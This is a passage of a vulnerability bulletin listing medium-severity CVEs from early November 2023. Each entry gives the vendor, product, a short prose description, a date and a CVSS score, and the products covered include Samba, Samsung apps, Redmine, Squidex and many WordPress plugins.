qualcomm — snapdragon Information Disclosure in Qualcomm IPC while reading values from shared memory in VM. 2023-11-07 5.5 CVE-2023-28554
qualcomm — snapdragon Information disclosure in IOE Firmware while handling WMI command. 2023-11-07 5.5 CVE-2023-28563
qualcomm — snapdragon Information disclosure in WLAN HAL while handling the WMI state info command. 2023-11-07 5.5 CVE-2023-28566
qualcomm — snapdragon Information disclosure in WLAN HAL when reception status handler is called. 2023-11-07 5.5 CVE-2023-28568
qualcomm — snapdragon Information disclosure in WLAN HAL while handling command through WMI interfaces. 2023-11-07 5.5 CVE-2023-28569
ragic — enterprise_cloud_database Rogic No-Code Database Builder’s file uploading function has insufficient filtering for special characters. A remote attacker with regular user privilege can inject JavaScript to perform XSS (Stored Cross-Site Scripting) attack. 2023-11-03 5.4 CVE-2023-41343
MISC
rapid7 — velociraptor Rapid7 Velociraptor versions prior to 0.7.0-4 suffer from a reflected cross site scripting vulnerability. This vulnerability allows attackers to inject JS into the error path, potentially leading to unauthorized execution of scripts within a user’s web browser. This vulnerability is fixed in version 0.7.0-04 and a patch is available to download. Patches are also available for version 0.6.9 (0.6.9-1). 2023-11-06 6.1 CVE-2023-5950
MISC
redhat — 3scale_api_management A flaw was found In 3Scale Admin Portal. If a user logs out from the personal tokens page and then presses the back button in the browser, the tokens page is rendered from the browser cache. 2023-11-06 5.5 CVE-2023-4910
MISC
MISC
redhat — quay A flaw was found in Quay. Clickjacking is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they intend to click on the top-level page. During the pentest, it has been detected that the config-editor page is vulnerable to clickjacking. This flaw allows an attacker to trick an administrator user into clicking on buttons on the config-editor panel, possibly reconfiguring some parts of the Quay instance. 2023-11-07 4.3 CVE-2023-4956
 
redmine — redmine Redmine before 4.2.11 and 5.0.x before 5.0.6 allows XSS in a Markdown formatter. 2023-11-05 6.1 CVE-2023-47258
MISC
redmine — redmine Redmine before 4.2.11 and 5.0.x before 5.0.6 allows XSS in the Textile formatter. 2023-11-05 6.1 CVE-2023-47259
MISC
redmine — redmine Redmine before 4.2.11 and 5.0.x before 5.0.6 allows XSS via thumbnails. 2023-11-05 6.1 CVE-2023-47260
MISC
roundcube — webmail Roundcube 1.5.x before 1.5.6 and 1.6.x before 1.6.5 allows XSS via a Content-Type or Content-Disposition header (used for attachment preview or download). 2023-11-06 6.1 CVE-2023-47272
MISC
MISC
MISC

 

samba — samba A vulnerability was discovered in Samba, where the flaw allows SMB clients to truncate files, even with read-only permissions when the Samba VFS module “acl_xattr” is configured with “acl_xattr:ignore system acls = yes”. The SMB protocol allows opening files when the client requests read-only access but then implicitly truncates the opened file to 0 bytes if the client specifies a separate OVERWRITE create disposition request. The issue arises in configurations that bypass kernel file system permissions checks, relying solely on Samba’s permissions. 2023-11-03 6.5 CVE-2023-4091
MISC
MISC
MISC
MISC
MISC
MISC
samba — samba A design flaw was found in Samba’s DirSync control implementation, which exposes passwords and secrets in Active Directory to privileged users and Read-Only Domain Controllers (RODCs). This flaw allows RODCs and users possessing the GET_CHANGES right to access all attributes, including sensitive secrets and passwords. Even in a default setup, RODC DC accounts, which should only replicate some passwords, can gain access to all domain secrets, including the vital krbtgt, effectively eliminating the RODC / DC distinction. Furthermore, the vulnerability fails to account for error conditions (fail open), like out-of-memory situations, potentially granting access to secret attributes, even under low-privileged attacker influence. 2023-11-07 6.5 CVE-2023-4154

 

samba — samba A vulnerability was found in Samba’s “rpcecho” development server, a non-Windows RPC server used to test Samba’s DCE/RPC stack elements. This vulnerability stems from an RPC function that can be blocked indefinitely. The issue arises because the “rpcecho” service operates with only one worker in the main RPC task, allowing calls to the “rpcecho” server to be blocked for a specified time, causing service disruptions. This disruption is triggered by a “sleep()” call in the “dcesrv_echo_TestSleep()” function under specific conditions. Authenticated users or attackers can exploit this vulnerability to make calls to the “rpcecho” server, requesting it to block for a specified duration, effectively disrupting most services and leading to a complete denial of service on the AD DC. The DoS affects all other services as “rpcecho” runs in the main RPC task. 2023-11-06 6.5 CVE-2023-42669
MISC
MISC
MISC
MISC
MISC
samba — samba A flaw was found in Samba. It is susceptible to a vulnerability where multiple incompatible RPC listeners can be initiated, causing disruptions in the AD DC service. When Samba’s RPC server experiences a high load or unresponsiveness, servers intended for non-AD DC purposes (for example, NT4-emulation “classic DCs”) can erroneously start and compete for the same unix domain sockets. This issue leads to partial query responses from the AD DC, causing issues such as “The procedure number is out of range” when using tools like Active Directory Users. This flaw allows an attacker to disrupt AD DC services. 2023-11-03 6.5 CVE-2023-42670
MISC
MISC
MISC
MISC
MISC
samsung — account Use of implicit intent for sensitive communication vulnerability in startAgreeToDisclaimerActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege. 2023-11-07 6.5 CVE-2023-42546
samsung — account Use of implicit intent for sensitive communication vulnerability in startEmailValidationActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege. 2023-11-07 6.5 CVE-2023-42547
samsung — account Use of implicit intent for sensitive communication vulnerability in startMandatoryCheckActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege. 2023-11-07 6.5 CVE-2023-42548
samsung — account Use of implicit intent for sensitive communication vulnerability in startNameValidationActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege. 2023-11-07 6.5 CVE-2023-42549
samsung — account Use of implicit intent for sensitive communication vulnerability in startSignIn in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege. 2023-11-07 6.5 CVE-2023-42550
samsung — account Use of implicit intent for sensitive communication vulnerability in startTncActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege. 2023-11-07 6.5 CVE-2023-42551
samsung — account Improper access control vulnerability in Samsung Account prior to version 14.5.01.1 allows attackers to access sensitive information via implicit intent. 2023-11-07 5.5 CVE-2023-42540
samsung — android Improper Input Validation with USB Gadget Interface prior to SMR Nov-2023 Release 1 allows a physical attacker to execute arbitrary code in Kernel. 2023-11-07 6.8 CVE-2023-42533
samsung — android Improper input validation vulnerability in ProcessWriteFile of libsec-ril prior to SMR Nov-2023 Release 1 allows local attackers to expose sensitive information. 2023-11-07 5.5 CVE-2023-42527
samsung — android Improper input validation vulnerability in ChooserActivity prior to SMR Nov-2023 Release 1 allows local attackers to read arbitrary files with system privilege. 2023-11-07 5.5 CVE-2023-42534
samsung — easysetup Use of implicit intent for sensitive communication vulnerability in EasySetup prior to version 11.1.13 allows attackers to get the bluetooth address of user device. 2023-11-07 5.5 CVE-2023-42555
samsung — email Improper authorization verification vulnerability in Samsung Email prior to version 6.1.90.4 allows attackers to read sandbox data of email. 2023-11-07 5.3 CVE-2023-42553
samsung — health PendingIntent hijacking vulnerability in ChallengeNotificationManager in Samsung Health prior to version 6.25 allows local attackers to access data. 2023-11-07 5.5 CVE-2023-42539
samsung — pass Improper Authentication vulnerabiity in Samsung Pass prior to version 4.3.00.17 allows physical attackers to bypass authentication. 2023-11-07 6.8 CVE-2023-42554
samsung — push_service Improper authorization in PushClientProvider of Samsung Push Service prior to version 3.4.10 allows attacker to access unique id. 2023-11-07 5.3 CVE-2023-42541
samsung — quick_share Improper access control vulnerability in Quick Share prior to 13.5.52.0 allows local attacker to access local files. 2023-11-07 5.5 CVE-2023-42544
samsung — ue40d7000_firmware Improper Restriction of Excessive Authentication Attempts vulnerability in Samsung Smart TV UE40D7000 version T-GAPDEUC-1033.2 and before allows attackers to cause a denial of service via WPS attack tools. 2023-11-08 4.3 CVE-2023-41270
 
sfu — pkp_web_application_library Missing Authorization in GitHub repository pkp/pkp-lib prior to 3.3.0-16. 2023-11-07 5.4 CVE-2023-5900
 
sfu — pkp_web_application_library Cross-site Scripting (XSS) – Stored in GitHub repository pkp/pkp-lib prior to 3.3.0-16. 2023-11-07 5.4 CVE-2023-5903
 
sfu — pkp_web_application_library Cross-site Scripting (XSS) – Stored in GitHub repository pkp/pkp-lib prior to 3.3.0-16. 2023-11-07 5.4 CVE-2023-5904
 
sfu — pkp_web_application_library PKP-WAL (aka PKP Web Application Library or pkp-lib) before 3.3.0-16, as used in Open Journal Systems (OJS) and other products, does not verify that the file named in an XML document (used for the native import/export plugin) is an image file, before trying to use it for an issue cover image. 2023-11-06 5.3 CVE-2023-47271
MISC
sfu — pkp_web_application_library Unrestricted Upload of File with Dangerous Type in GitHub repository pkp/pkp-lib prior to 3.3.0-16. 2023-11-07 4.8 CVE-2023-5901
 
sigstore — cosign Cosign is a sigstore signing tool for OCI containers. Cosign is susceptible to a denial of service by an attacker-controlled registry. An attacker who controls a remote registry can return a high number of attestations and/or signatures to Cosign and cause Cosign to enter a long loop resulting in an endless data attack. The root cause is that Cosign loops through all attestations fetched from the remote registry in pkg/cosign.FetchAttestations. The attacker needs to compromise the registry or make a request to a registry they control. When doing so, the attacker must return a high number of attestations in the response to Cosign. The result will be that the attacker can cause Cosign to go into a long or infinite loop that will prevent other users from verifying their data. In Kyvernos case, an attacker whose privileges are limited to making requests to the cluster can make a request with an image reference to their own registry, trigger the infinite loop and deny other users from completing their admission requests. Alternatively, the attacker can obtain control of the registry used by an organization and return a high number of attestations instead the expected number of attestations. The issue can be mitigated rather simply by setting a limit to the limit of attestations that Cosign will loop through. The limit does not need to be high to be within the vast majority of use cases and still prevent the endless data attack. This issue has been patched in version 2.2.1 and users are advised to upgrade. 2023-11-07 5.3 CVE-2023-46737
 
softing — smartlink_sw-ht Cross-site Scripting vulnerability in Softing smartLink SW-HT before 1.30, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. 2023-11-06 6.1 CVE-2022-48192
MISC
MISC
squid-cache — squid SQUID is vulnerable to HTTP request smuggling, caused by chunked decoder lenience, allows a remote attacker to perform Request/Response smuggling past firewall and frontend security systems. 2023-11-03 5.3 CVE-2023-46846
MISC
MISC
MISC
MISC
MISC
MISC

 

squidex.io — squidex Squidex is an open source headless CMS and content management hub. Affected versions are missing origin verification in a postMessage handler which introduces a Cross-Site Scripting (XSS) vulnerability. The editor-sdk.js file defines three different class-like functions, which employ a global message event listener: SquidexSidebar, SquidexWidget, and SquidexFormField. The registered event listener takes some action based on the type of the received message. For example, when the SquidexFormField receives a message with the type valueChanged, the value property is updated. The SquidexFormField class is for example used in the editor-editorjs.html file, which can be accessed via the public wwwroot folder. It uses the onValueChanged method to register a callback function, which passes the value provided from the message event to the editor.render. Passing an attacker-controlled value to this function introduces a Cross-Site Scripting (XSS) vulnerability. 2023-11-07 6.1 CVE-2023-46252
squidex.io — squidex Squidex is an open source headless CMS and content management hub. In affected versions a stored Cross-Site Scripting (XSS) vulnerability enables privilege escalation of authenticated users. The SVG element filtering mechanism intended to stop XSS attacks through uploaded SVG images, is insufficient resulting to stored XSS attacks. Squidex allows the CMS contributors to be granted the permission of uploading an SVG asset. When the asset is uploaded, a filtering mechanism is performed to validate that the SVG does not contain malicious code. The validation logic consists of traversing the HTML nodes in the DOM. In order for the validation to succeed, 2 conditions must be met: 1. No HTML tags included in a “blacklist” called “InvalidSvgElements” are present. This list only contains the element “script”. and 2. No attributes of HTML tags begin with “on” (i.e. onerror, onclick) (line 65). If either of the 2 conditions is not satisfied, validation fails and the file/asset is not uploaded. However it is possible to bypass the above filtering mechanism and execute arbitrary JavaScript code by introducing other HTML elements such as an <iframe> element with a “src” attribute containing a “javascript:” value. Authenticated adversaries with the “assets.create” permission, can leverage this vulnerability to upload a malicious SVG as an asset, targeting any registered user that will attempt to open/view the asset through the Squidex CMS. 2023-11-07 5.4 CVE-2023-46744
synology — ssl_vpn_client Buffer copy without checking size of input (‘Classic Buffer Overflow’) vulnerability in cgi component in Synology SSL VPN Client before 1.4.7-0687 allows local users to conduct denial-of-service attacks via unspecified vectors. 2023-11-07 5.5 CVE-2023-5748
teamamaze — amaze_file_utilities Improper Authorization in GitHub repository teamamaze/amazefileutilities prior to 1.91. 2023-11-03 5.5 CVE-2023-5948
MISC
MISC
timeteccloud — auto_web-based_database_management_system Cross Site Scripting vulnerability in timetec AWDMS v.2.0 allows an attacker to obtain sensitive information via a crafted payload to the remark parameter of the New Zone function. 2023-11-08 5.4 CVE-2023-46483
urbackup — urbackup_server UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid. 2023-11-07 5.3 CVE-2023-47102
veeam — one A vulnerability in Veeam ONE allows an unprivileged user who has access to the Veeam ONE Web Client the ability to acquire the NTLM hash of the account used by the Veeam ONE Reporting Service. Note: The criticality of this vulnerability is reduced as it requires interaction by a user with the Veeam ONE Administrator role. 2023-11-07 5.4 CVE-2023-38549
veeam — one A vulnerability in Veeam ONE allows an unprivileged user who has access to the Veeam ONE Web Client the ability to acquire the NTLM hash of the account used by the Veeam ONE Reporting Service. 2023-11-07 4.3 CVE-2023-38548
veeam — one A vulnerability in Veeam ONE allows a user with the Veeam ONE Read-Only User role to view the Dashboard Schedule. Note: The criticality of this vulnerability is reduced because the user with the Read-Only role is only able to view the schedule and cannot make changes. 2023-11-07 4.3 CVE-2023-41723
visser — store_exporter_for_woocommerce Unauth. Reflected Cross-Site Scripting’) vulnerability in Visser Labs Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More plugin <= 2.7.2 versions. 2023-11-06 6.1 CVE-2023-46822
MISC
wisdomgarden — tronclass_ilearn NCSIST ManageEngine Mobile Device Manager(MDM) APP’s special function has a path traversal vulnerability. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and read arbitrary system files. 2023-11-03 6.5 CVE-2023-41356
MISC
wondercms — wondercms Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component. 2023-11-07 6.1 CVE-2023-41425
 
wordpress — wordpress The Front End PM WordPress plugin before 11.4.3 does not block listing the contents of the directories where it stores attachments to private messages, allowing unauthenticated visitors to list and download private attachments if the autoindex feature of the web server is enabled. 2023-11-06 6.5 CVE-2023-4930
MISC
wordpress — wordpress The WD WidgetTwitter plugin for WordPress is vulnerable to SQL Injection via the plugin’s shortcode in versions up to, and including, 1.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. 2023-11-07 6.5 CVE-2023-5709
 
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Kathy Darling Simple User Listing plugin <= 1.9.2 versions. 2023-11-08 6.1 CVE-2023-32298
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Enej Bajgoric / Gagan Sandhu / CTLT DEV User Avatar plugin <= 1.4.11 versions. 2023-11-08 6.1 CVE-2023-46621
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in FLOWFACT WP Connector plugin <= 2.1.7 versions. 2023-11-08 6.1 CVE-2023-46626
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Ashish Ajani WordPress Simple HTML Sitemap plugin <= 2.1 versions. 2023-11-08 6.1 CVE-2023-46627
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WPSolutions-HQ WPDBSpringClean plugin <= 1.6 versions. 2023-11-07 6.1 CVE-2023-47510
wordpress — wordpress The Awesome Support WordPress plugin before 6.1.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. 2023-11-06 6.1 CVE-2023-5354
MISC
wordpress — wordpress The Digirisk plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘current_group_id’ parameter in version 6.0.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2023-11-03 6.1 CVE-2023-5946
MISC
MISC
wordpress — wordpress Auth. (author+) Stored Cross-Site Scripting (XSS) vulnerability in simonpedge Slide Anything – Responsive Content / HTML Slider and Carousel plugin <= 2.4.9 versions. 2023-11-07 5.4 CVE-2023-28499
wordpress — wordpress Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Jens Kuerschner Add to Calendar Button plugin <= 1.5.1 versions. 2023-11-08 5.4 CVE-2023-46613
wordpress — wordpress Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in D. Relton Medialist plugin <= 1.3.9 versions. 2023-11-08 5.4 CVE-2023-46640
wordpress — wordpress Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Chris Yee MomentoPress for Momento360 plugin <= 1.0.1 versions. 2023-11-06 5.4 CVE-2023-46782
MISC
wordpress — wordpress Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Bright Plugins Pre-Orders for WooCommerce plugin <= 1.2.13 versions. 2023-11-06 5.4 CVE-2023-46783
MISC
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Yakir Sitbon, Ariel Klikstein Linker plugin <= 1.2.1 versions. 2023-11-06 5.4 CVE-2023-47177
MISC
wordpress — wordpress Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Apollo13Themes Apollo13 Framework Extensions plugin <= 1.9.0 versions. 2023-11-08 5.4 CVE-2023-47190
wordpress — wordpress Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Vyas Dipen Top 25 Social Icons plugin <= 3.1 versions. 2023-11-08 5.4 CVE-2023-47229
wordpress — wordpress Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Bainternet ShortCodes UI plugin <= 1.9.8 versions. 2023-11-08 5.4 CVE-2023-47231
wordpress — wordpress The Social Sharing Plugin – Social Warfare plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘social_warfare’ shortcode in versions up to, and including, 4.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-4842

 

wordpress — wordpress The Simple Like Page Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘sfp-page-plugin’ shortcode in versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-4888

 

wordpress — wordpress The Ziteboard Online Whiteboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘ziteboard’ shortcode in versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5076
 
wordpress — wordpress The ImageMapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘imagemap’ shortcode in versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5507
 
wordpress — wordpress The QR Code Tag plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘qrcodetag’ shortcode in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5567
 
wordpress — wordpress The Bitly’s plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘wpbitly’ shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5577
 
wordpress — wordpress The WP MapIt plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘wp_mapit’ shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5658
 
wordpress — wordpress The Interact: Embed A Quiz On Your Site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘interact-quiz’ shortcode in all versions up to, and including, 3.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5659
 
wordpress — wordpress The SendPress Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s shortcode(s) in all versions up to, and including, 1.22.3.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5660
 
wordpress — wordpress The Social Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘socialfeed’ shortcode in all versions up to, and including, 1.5.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5661
 
wordpress — wordpress The Featured Image Caption plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s shortcode and post meta in all versions up to, and including, 0.8.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5669

 

wordpress — wordpress The Gift Up Gift Cards for WordPress and WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘giftup’ shortcode in all versions up to, and including, 2.20.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5703

 

wordpress — wordpress The SEO Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘slider’ shortcode and post meta in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-03 5.4 CVE-2023-5707
MISC
MISC
MISC
MISC
wordpress — wordpress The Telephone Number Linker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘telnumlink’ shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-07 5.4 CVE-2023-5743

 

wordpress — wordpress The video carousel slider with lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing or incorrect nonce validation on the responsive_video_gallery_with_lightbox_video_management_func() function. This makes it possible for unauthenticated attackers to delete videos hosted from the video slider via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2023-11-03 5.4 CVE-2023-5945
MISC
MISC
MISC
wordpress — wordpress The UpdraftPlus: WordPress Backup & Migration Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.23.10. This is due to a lack of nonce validation and insufficient validation of the instance_id on the ‘updraftmethod-googledrive-auth’ action used to update Google Drive remote storage location. This makes it possible for unauthenticated attackers to modify the Google Drive location that backups are sent to via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This can make it possible for attackers to receive backups for a site which may contain sensitive information. 2023-11-07 5.4 CVE-2023-5982
 
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Pixelgrade Comments Ratings plugin <= 1.1.7 versions. 2023-11-06 4.8 CVE-2023-23702
MISC
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Michael Mann Simple Site Verify plugin <= 1.0.7 versions. 2023-11-09 4.8 CVE-2023-36688
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in sahumedia SAHU TikTok Pixel for E-Commerce plugin <= 1.2.2 versions. 2023-11-08 4.8 CVE-2023-46642
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Om Ak Solutions Slick Popup: Contact Form 7 Popup Plugin plugin <= 1.7.14 versions. 2023-11-06 4.8 CVE-2023-46824
MISC
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Martin Gibson IdeaPush plugin <= 8.52 versions. 2023-11-08 4.8 CVE-2023-47181
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Proper Fraction LLC. Admin Bar & Dashboard Access Control plugin <= 1.2.8 versions. 2023-11-06 4.8 CVE-2023-47184
MISC
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in WP Map Plugins Basic Interactive World Map plugin <= 2.0 versions. 2023-11-08 4.8 CVE-2023-47223
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in I Thirteen Web Solution Post Sliders & Post Grids plugin <= 1.0.20 versions. 2023-11-08 4.8 CVE-2023-47226
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Web-Settler Social Feed | All social media in one place plugin <= 1.5.4.6 versions. 2023-11-08 4.8 CVE-2023-47227
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Muneeb Layer Slider plugin <= 1.1.9.7 versions. 2023-11-08 4.8 CVE-2023-47228
wordpress — wordpress The Responsive Pricing Table WordPress plugin before 5.1.8 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-11-06 4.8 CVE-2023-4810
MISC
MISC
wordpress — wordpress The Simple Table Manager WordPress plugin through 1.5.6 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). 2023-11-06 4.8 CVE-2023-4858
MISC
MISC
wordpress — wordpress The WP Discord Invite WordPress plugin before 2.5.2 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-11-06 4.8 CVE-2023-5181
MISC
wordpress — wordpress The User Registration WordPress plugin before 3.0.4.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). 2023-11-06 4.8 CVE-2023-5228
MISC
wordpress — wordpress The Ninja Forms Contact Form WordPress plugin before 3.6.34 does not sanitize and escape its label fields, which could allow high privilege users such as admin to perform Stored XSS attacks. Only users with the unfiltered_html capability can perform this, and such users are already allowed to use JS in posts/comments etc. however the vendor acknowledged and fixed the issue 2023-11-06 4.8 CVE-2023-5530
MISC
MISC
wordpress — wordpress The URL Shortify WordPress plugin through 1.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-11-06 4.8 CVE-2023-5605
MISC
wordpress — wordpress The Amazonify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 0.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. However, please note that this can also be combined with CVE-2023-5818 for CSRF to XSS. 2023-11-07 4.8 CVE-2023-5819

 

wordpress — wordpress The Awesome Support WordPress plugin before 6.1.5 does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission. 2023-11-06 4.3 CVE-2023-5352
MISC
wordpress — wordpress The ImageMapper plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the ‘imgmap_delete_area_ajax’ function in versions up to, and including, 1.2.6. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts and pages. 2023-11-07 4.3 CVE-2023-5506
 
wordpress — wordpress The ImageMapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.6. This is due to missing or incorrect nonce validation on the ‘imgmap_save_area_title’ function. This makes it possible for unauthenticated attackers to update the post title and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. 2023-11-07 4.3 CVE-2023-5532
 
wordpress — wordpress The Amazonify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8.1. This is due to missing or incorrect nonce validation on the amazonifyOptionsPage() function. This makes it possible for unauthenticated attackers to update the plugins settings, including the Amazon Tracking ID, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2023-11-07 4.3 CVE-2023-5818
 
wordpress — wordpress Cross-Site Request Forgery (CSRF) in GitHub repository pkp/pkp-lib prior to 3.3.0-16. 2023-11-07 4.3 CVE-2023-5902
 
wordpress — wordpress The ImageMapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.6. This is due to missing or incorrect nonce validation on multiple functions. This makes it possible for unauthenticated attackers to update the plugin settings via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. 2023-11-07 4.3 CVE-2023-5975

 

